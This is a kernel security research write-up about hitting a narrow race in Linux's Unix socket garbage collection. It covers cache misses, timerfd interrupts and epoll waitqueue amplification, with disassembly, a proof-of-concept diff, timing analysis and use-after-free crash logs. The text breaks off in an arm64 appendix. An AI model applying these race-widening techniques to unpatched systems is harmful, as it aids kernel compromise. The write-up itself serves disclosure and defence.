Reading view

There are new articles available, click to refresh the page.

Racing against the clock -- hitting a tiny kernel race window

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

While __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,

                                 fmode_t mask, unsigned int refs)

{

        struct file *file;

        rcu_read_lock();

loop:

        file = files_lookup_fd_rcu(files, fd); // race window start

        if (file) {

                /* File object ref couldn't be taken.

                 * dup2() atomicity guarantee is the reason

                 * we loop to catch the new file (or NULL pointer)

                 */

                if (file->f_mode & mask)

                        file = NULL;

                else if (!get_file_rcu_many(file, refs)) // race window end

                        goto loop;

        }

        rcu_read_unlock();

        return file;

}

In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax

<__fget_files+0x21> sbb    rax,rax

<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]

<__fget_files+0x28> and    eax,r8d

<__fget_files+0x2b> lea    rax,[rdx+rax*8]

<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START

; r12 now contains file*

<__fget_files+0x32> test   r12,r12

<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x37> mov    eax,r9d

<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)

<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)

<__fget_files+0x46> lea    rdx,[r12+0x38]

<__fget_files+0x4b> test   rax,rax

<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>

<__fget_files+0x50> lea    rcx,[rsi+rax*1]

<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter(TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
  • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
  • If it returns the old victim FD number:
  • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
  • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@

     }

 

+#if 0

     // bounce socket's file refcount over to other cpu

     pin_to(2);

     close(SYSCHK(dup(RESURRECT_FD+1-1)));

     pin_to(1);

+#endif

 

     //printf("setting timer\n");

@@ -352,5 +354,5 @@

     close(loop_root);

     while (ts_is_in_future(spin_stop))

-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));

+      close(SYSCHK(dup(RESURRECT_FD)));

     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines -, but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

       /* All candidates should have been detached by now. */

        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI

CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Call Trace:

[...]

 unix_stream_recvmsg+0x53/0x70

[...]

 __sys_recvfrom+0x166/0x180

[...]

 __x64_sys_recvfrom+0x25/0x30

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

---[ end trace 39a81eb3a52e239c ]---

=============================================================================

BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten

-----------------------------------------------------------------------------

INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b

INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200

INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918

Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk

Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.

Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ

Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ

CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

Call Trace:

 dump_stack+0x6b/0x83

 check_bytes_and_report.cold+0x79/0x9a

 check_object+0x217/0x260

[...]

 alloc_debug_processing+0xd5/0x130

 ___slab_alloc+0x511/0x570

[...]

 __slab_alloc+0x1c/0x30

 kmem_cache_alloc_node+0x1f3/0x210

 __alloc_skb+0x46/0x1f0

 alloc_skb_with_frags+0x4d/0x1b0

 sock_alloc_send_pskb+0x1f3/0x220

[...]

 unix_stream_sendmsg+0x268/0x4d0

 sock_sendmsg+0x5e/0x60

 ____sys_sendmsg+0x22e/0x270

[...]

 ___sys_sendmsg+0x75/0xb0

[...]

 __sys_sendmsg+0x59/0xa0

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b

FIX skbuff_head_cache: Marking all objects used

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...

This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442         add        x2, x2, #0x1

